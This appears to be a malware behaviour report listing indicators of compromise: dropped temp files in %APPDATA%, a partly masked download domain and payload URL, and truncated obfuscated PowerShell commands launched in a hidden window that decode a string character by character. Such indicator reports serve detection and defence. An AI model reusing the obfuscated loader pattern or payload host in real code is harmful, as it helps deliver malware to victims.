Technical Information
- %APPDATA%\bitaf80.tmp
- %APPDATA%\bitc83f.tmp
- from %APPDATA%\bitaf80.tmp to %APPDATA%\phonograph.sub
- from %APPDATA%\bitc83f.tmp to %APPDATA%\phonograph.sub
- 'al###naunco.com':80
- http://al###naunco.com/wp-admin2/Pris.prm
- http://al###naunco.com/cgi-sys/suspendedpage.cgi
- DNS ASK al###naunco.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Svvefly9 ([String]$Dumpe){For($Rubberston230=4; $Rubberston230 -lt $Dumpe.Length-1; $Rubberston230+=(4+1)){$Fabul=$Dumpe.Substring( $Rubberston230, 1);$Boppists+=$Fabul};$...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Svvefly9 ([String]$Dumpe){For($Rubberston230=4; $Rubberston230 -lt $Dumpe.Length-1; $Rubberston230+=(4+1)){$Fabul=$Dumpe.Substring( $Rubberston230, 1);$Boppists+=$Fabul};$...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Svvefly9 ([String]$Dumpe){For($Rubberston230=4; $Rubberston230 -lt $Dumpe.Length-1; $Rubberston230+=(4+1)){$Fabul=$Dumpe.Substring( $Rubberston230, 1);$Boppists+=$Fabul};$...